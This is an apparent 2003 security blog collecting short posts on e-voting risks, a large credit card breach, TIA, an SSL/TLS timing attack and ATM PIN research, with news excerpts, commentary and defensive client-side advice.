1. "Transmission...uses an ES&S proprietary protocol that includes proprietary data format and checking....If a standard PC with a modem attempts to link up with a Data Acquisition Manager (DAM) Host, the modems will initially link up but no intelligible information will be received by either unit."

Don't know about you but that gives me warm fuzzies. Of course this is not unlike things that I see in RFPs for other kinds of technology all the time. You would (and should) expect more from such a critical system though.

2. "To add additional security..." [as if 1 is not enough] "...there is an eight-position password built into the protocol"

They go on to say that there is a time period--not a number of failed attempts--that governs disconnect if the correct password is not entered. So, it sounds like someone could brute-force. Is 8-position just numeric, or does it include alpha too?

I could go on but don't want to ruin it for you.

I heard someone talk about how in the 50's and 60's everyone was building bomb shelters for protection against nuclear attack and fallout but now people are being told that some tarp and duct tape are all that is needed.

The question was asked, "Who is going to protect us from Tom Ridge, and his bumblers in the Dept of Homeland Security..."

[IP] More bad advice from Tom Ridge...

NPR : Duct and Cover?

"In what is believed to be the biggest credit card hacking incident so far, Omaha-based Data Processors International, which processes transactions involving Visa, MasterCard, American Express and Discover Financial Services for merchants, said in a statement that it had "recently experienced a system intrusion by an unauthorized outside party."

Yahoo! News - FBI Probing Theft of 8 Million Credit Card Numbers

There is a story in this month's ACM MemberNet publication on the ACM's opposition to Total Information Awareness (TIA).

This isn't exactly news, because the ADM letter was drafted on Jan 23. The latest status on the EPIC TIA page was Jan 24 when Amendment 59 was included in a bill to impose limits on TIA. However, the requirement that the government simply provide a report in order to continue funding seems weak. There isn't anything defining what content within the report would be satisfactory. It sounds too much like corporate privacy policies. It doesn't matter what is in them, so long as the company abides by it. The report could say exactly what privacy advocates fear most and TIA will still be funded. However, the catch-all requiring congress to approve use of TIA is a step in the right direction.

Santa Clara County faces key decision on electronic ballots

"The future of electronic voting may be rewritten this week in Santa
Clara County, where county leaders are weighing warnings that the
touch-screen voting machines they want to buy are more prone to error
and fraud than the systems they would replace."

"Sequoia's systems don't produce paper ballots that voters can verify,
and supervisors didn't ask for such a device in their bid
proposal. Vendors and election officials say paper ballots aren't
needed because the machines have internal safeguards, are certified by
federal and state governments and tested repeatedly before and after
elections."

Ack! Read the research! Read my rant! Just stop immediately and don't do anything yet!

"``We still believe they're secure,'' Assistant County Executive Peter
Kutras said Friday. ``There are not any issues that should cause
concern in terms of voter confidence.'' "

Good Grief.

This is also good press for the petition that David Dill at Stanford began. Hopefully they will listen.

A study of TCP/IP code of various commercial and open source operating systems found that the defect rate in the Linux implementation was much better than others studied.

"The Linux defect rate was 0.1 defects per 1,000 lines of code,
Reasoning found. The rate for the general-purpose operating
systems--two of them versions of Unix--was between 0.6 and 0.7 per
1,000 lines of code. The rates for the two embedded operating systems
were 0.1 and 0.3 per 1,000 lines of code. "

Because of the very limited scope of this audit, and because who knows what specific defects were being tested out of the set of all possible defects, I would not be so quick to draw sweeping conclusions from it. However, it is very interesting in itself.

Study lauds open-source code quality

From RISKS 25.57.

I have friends who dive and hope to get certified myself soon so this is of particular concern.

Date: 17 Feb 2003 05:35:20 -0800
From: tom.race@skipton.co.uk (Tom Race)
Subject: Scuba diving computer recall

[See also Risks in scuba equipment, Carl Page, RISKS-21.41]

In simple terms, a dive computer monitors the amount of nitrogen
dissolved
in the diver's blood. Typically worn like a wrist watch, it tracks the
diver's depth and calculates the absorbed nitrogen according to a
mathematical model of the human body's various tissues.

If a diver surfaces too quickly with too much nitrogen in the body it is
released as bubbles within the blood or tissues, potentially causing
injury
or death through Decompression Sickness (DCS). Divers typically rely
heavily on a computer to tell them when to surface to avoid DCS.

The manufacturer below is being sued over the mathematical model, which
has
a faulty assumption, or more likely a complete oversight. The model
embedded in this computer assumes that the diver on the surface
continues to
breath whatever gas mixture they were diving with. When the diver is
using
nitrox, a gas mixture containing extra oxygen and therefore less
nitrogen
than air, the computer will assume that they are releasing nitrogen at a
higher rate than reality. Over several dives and several intervals on
the
surface, the state of the mathematical model and the diver's actual
nitrogen
levels may become seriously different, and in the 'wrong' (more risky)
direction.

A failure of requirements specification or code inspection? The lawsuit
refers to a 'manufacturing defect'.

I have an interest, since I have a nitrox computer from the same
manufacturer. Fortunately mine is more recent, and I have not used it
for
gases other than air.

Tom Race

A 2-17-2003 very short Reuters story reports that Over 5 million Visa/MasterCard accounts hacked into

"More than five million Visa and MasterCard accounts throughout the nation were accessed after the computer system at a third party processor was hacked into, according to representatives for the card association"

This story by the BBC has more details

Great. Why were the account numbers on Internet-accessible systems. And why were the accounts not stored encrypted at the third party?

5 million accounts is about 1% of the 560 million total cards in circulation. This is huge.

From RISKS 22.56

"Date: Thu, 13 Feb 2003 05:46:37 -0500
From: "Rebecca Mercuri"
Subject: Risks of Doing Homework

At the faculty meeting at Bryn Mawr College on 12 Feb 2003, we were
informed that a student at Haverford (our affiliated College) was arrested over
the weekend when he was trying to do his homework assignment in
Philadelphia.
As part of the Cities project, he was taking photographs of SEPTA (our
regional transit authority) facilities when he was arrested, detained
for a few hours, and eventually released. Haverford administration is working
to try to ensure that this event not be a part of the student's permanent
police record. Apparently taking photographs at transit facilities is
cause for arrest during "Code Orange" alert, the authorities explained.
Faculty were advised to be careful about assigning "field trip" projects during
such alerts.

Rebecca Mercuri, Bryn Mawr Computer Science"

A Wired article describes an unbelievable story of reporter Noah Shachtman trivially breaching the physical security at none-other-than Los Alamos National Laboratory described as "the world's most important nuclear research facility".

"On Saturday morning, I slipped into and out of a
top-secret area of the lab while guards sat, unaware, less than a
hundred yards away."

"
In a paper researchers at the Security and Cryptography Laboratory of
Swiss University (Lasec) EPFL demonstrate a timing-based attack on CBC
cipher suites in SSL and TLS.

The attack assumes that multiple SSL or TLS connections involve a
common fixed plaintext block, such as a password. Since credit cards
numbers are normally sent to a secure server only once this particular
attack has little or no chance of success.

When checking emails, using for example an Outlook Express 6.x client,
using a secure connection passwords are sent periodically as email is
checked. This leaves the door open for an attack. "

The attack relies on the protocol being a bit too chatty in providing information . There are many limitations that make this not especially critical, although IMAP/POP clients like Outlook exacerbate the risk because they will happily keep resending your encrypted password to the server if it does not succeed.

The Register article

Peter Gutman, of cryptlib fame, posted some client-side coding suggestions to ensure that you are not at risk, regardless of whether your server is vulnerable or not:'

- Don't retry a connection repeatedly if it fails the first time (I guess you don't do that anyway, but some programs like Outlook try automated repeated connects).

- Add random whitespace to the initial messages so the password isn't
always at a fixed location (that is, sprinkle extra spaces and tabs and
whatnot around in the lines you send up to and including the password).

-- Snip --

This changes the padding on each message containing the password, making
the attack rather more difficult, and has the advantage that you don't need
to convince the party running the server to update their software.
Depending on how much stuff you can send per message, you can vary it by quite a bit.
In the POP case the "PASS xxx" would be a single message so you don't have
quite that much leeway, but it looks like you can add enough whitespace to
make the padding random. Someone else on the list posted a followup to say he'd
tried it on two servers and they had no trouble with the whitespace.

There is an excellent technical summary that I'll have to dig up and post later. It listed out all of the limitations that could mitigate your risk.

Citibank is trying to prevent the disclosure of new scientific research that has apparently broken ATM PIN confidentiality protection wide-open. This is even in the face of "phantom" charges appearing on people's accounts that banks refuse to reverse, claiming that their system is so secure that users cannot repudiate such charges.

"The card's issuer says that's not possible, because their ATM network
is secure, and is suing the couple to recover the nearly $80,000 that
was charged against the card. "

The raw archived information:

Protocol Analysis, Composability and Computation

There is a slashdot discussion

There is an eWeek article too: Attack Exposes ATM Vulnerabilities

Well-known cryptographer Ross Anderson offered this testimony in the case:
""In addition to being published material, derived from open sources,
and of crucial importance to the defendants' case, the vulnerabilities
are likely to be crucially important in other cases brought in the
U.K. and elsewhere over disputed ATM transactions," Anderson wrote in
his letter. "Bond plans to incorporate much of this material into his
Ph.D. thesis. It is spectacularly unfair for the applicant to ask you,
in effect, to prohibit Bond from including in his thesis a scientific
discovery that he has already published.""

A recent MIT study of 129 used hard drives indicated that people leave a treasure trove of data behind on their discarded computers.

This begs the question of how can you securely dispose of old hard drives? Well, the typical answers are to use a secure wiping program or degaussing, but these are not 100% effective.

Some people have come up with a foolproof method called Drive Slagging which involves melting down the platters and essentially creating aluminum ingots.

Not exactly do-it-yourself though :-)

DRM is getting even more annoying, dangerous, and insidious. Intuit thought that it would be necessary to utilize a product called SafeCast to prevent unauthorized copying of its popular TurboTax product. Extremetech did some testing and found that SafeCast copy (not copyright) protection relied on modifying sector 33 on your hard drive outside of your operating system. This is not necessarily a Good Thing ™

TurboTax Test Results Part II

What to do now? Should you use TurboTax or switch to a competitor's product? Well, Intuit has been listening to the complaints and have offered some concessions, including assurance that a version of TurboTax that won't require "activation" to utilize will be released after October 2003, allowing SafeCast to be uninstalled when TurboTax is uninstalled.
TurboTax: So What Do I Do Now?

Timeline of the problems and Intuit's response Most interesting here was this note that "Analysts sharply question Intuit about TurboTax product activation." when they reported their quarterly results on February 13.

There is an excellent article in BusinessWeek on what is supposed to be the fastest growing crime in the U.S.: Identity Theft. I agree that only radical reform will solve the problem. However, I always think that the solutions focus on symptoms of the problem disclosure of customer identifying information) and not on the root cause of the problem (insufficient authentication (i.e. PROOF of identity) requirements by credit issuers). Your identifying information should not have to be secret. That is the mark of an insecure system.

The biggest problem with identity theft is the human element though. Consumers really don't want the additional security that would prevent identity theft because of the additional hassle it would cause them. I hear all the time about people who get offended by having to show I.D. for financial transactions--even when it is explained why this is necessary. It must be that people are natuarally trusting and to have someone challenge their authenticity is offensive. Perhaps it takes becoming the victim of identity theft to actually see that there are rational reasons to have better security...

I do like the idea of a market-driven solution. There are plenty of areas where the market fosters very poor security. Government mandates can change this tide and force novel approaches, like the one in this article.

BW Online | February 11, 2003 | To Thwart the Identity Thieves

Richard Forno was let go by Symantec, coincidentally right after he had politely complained in a letter about the extremely inefficient payment procedures they brought with them to SecurityFocus.

I really enjoyed his commentary so I hope to see him show up somewhere else soon!

symantec-bitch

The C4I.org - Computer Security and Intelligence website has, according to the author, "little nuggets" of information he finds "interesting enough to post online".

The most interesting thing that I found there (so far) is Tradesports.com where people are betting on current events, such as whether or not Saddam will still be in power as of March 31.

-Jason

Senate Committee on National Security and Defense in Canada recently released a report on the new airport security measures.

Entitled, "The Myth of Security at Canada�s Airports"

"...measures have reassured many travellers that security has been tightened at Canadian airports since the tragic events of September 11, 2001. The problem is that there has been little or no improvement to huge security gaps that persist behind the scenes in the Canadian travel industry. "

There is also a full-disclosure debate arising over whistle-blowers who may point out that money or effort is being misdirected:

"Our basic premise: You can be sure that ships really will sink if they have a lot holes in them. And those holes aren�t likely to get patched unless the public applies pressure to get the job done. They certainly aren�t patched yet. "

Security measures should be able to withstand scrutiny.

Fifth Report: The Myth of Security at Canada�s Airports

Declan McCullagh asks a good question on the cryptography list:

When encryption is omnipresent in everything from wireless networks to hard drives to SSH clients, might the basic effect of such a law [Patriot 2] be to boost potential maximum prison terms by five years?

It is a terrible idea to presume that using encryption is an aggravating circumstance. "Why are you using encryption? You must have something to hide..."

Original SAFE Act: http://thomas.loc.gov/cgi-bin/bdquery/z?d105:h.r.00695:
Leaked new Patriot Act 2 draft: http://www.privacy.org/patriot2draft.pdf

"Human rights watchdog Privacy International has launched a quest to
find the World's Most Stupid Security Measure. "

http://www.theregister.co.uk/content/55/29279.html

There were some preliminary examples in discussion on the cryptography mailing list.

"The most important question to ask is this:

With respect to this year's all-electronic voting machines, is there any meaningful evidence that the vote you cast was correctly recorded -- that is, evidence that there were no misconfigured systems, accidents, internal fraud, etc.? For almost all of the existing systems (with the exception of one that actually incorporates the Mercuri Mechanism, namely, Avante), the answer is an UNEQUIVOCAL NO. This is an untenable situation if you believe in election integrity, IRRESPECTIVE of your party affiliations."

-- Peter G. Neumann

Electronic voting is very, very dangerous. Don't even get me started on Internet voting. There is only one known product on the marketplace that has done their homework and implemented the correct mechanism for ensuring election integrity that the research community has identified (the Mercuri Mechanism, above).

There are tons of published cases of errors and delays caused by electronic voting that has been done around the country in practice, including more votes being counted than registered voters in the precinct.

Here is one list: http://www.csl.sri.com/neumann/illustrative.html#24
And another: http://www.csl.sri.com/users/neumann/book-voting.html

Washington State is even looking at Internet Voting: http://www.secstate.wa.gov/elections/evoting_paper.aspx

I heard and saw Sam Reed talking about an Electronic Voting pilot in Washington State on the news. Here's a press release: http://www.secstate.wa.gov/office/news.aspx?news_id=150

This is an area that fascinates me because of all of the research that has gone into this area that public officials ignore on the dangers and how to do this correctly. They are often giving way too much credence to vendors that tell them all is safe. I would love to ask the people doing these pilots how they plan to assure voters of the integrity of the election, especially when e-voting machines are often closed-source and cannot be reverse-engineered because the companies claim trade secrets and will probably sic the DMCA on you.

When I get some time, I need to write some letters to representatives in this state. I will include these folks:

Sam Reed, Secretary of State
Dean Logan, Director of Elections (elections@secstate.wa.gov)
David M. Elliott, Assistant Director of Elections

To find the representatives in your district, check out http://dfind.leg.wa.gov/dfinder.cfm

In the meantime, there is a petition that you can sign up with:

http://verify.stanford.edu/evote.html

A ton of big-name researchers and security experts have already signed it.

And two renowned experts in electronic voting:

Rebecca Mercuri, Ph.D. http://www.notablesoftware.com/evote.html (been researching for over a decade). " Her position statement: http://www.notablesoftware.com/RMstatement.html

Peter G. Neumann (moderator of the ACM Risks Forum): http://www.csl.sri.com/users/neumann/ and a paper at http://www.csl.sri.com/users/neumann/ncs93.html
His excellent summary of the issue: http://www.interesting-people.org/archives/interesting-people/200211/msg00090.html

Avi Rubin has also written a paper on this topic: http://avirubin.com/e-voting.security.html

NPR also just ran a segment on the risks of electronic voting during Morning Edition Feb 10, 2003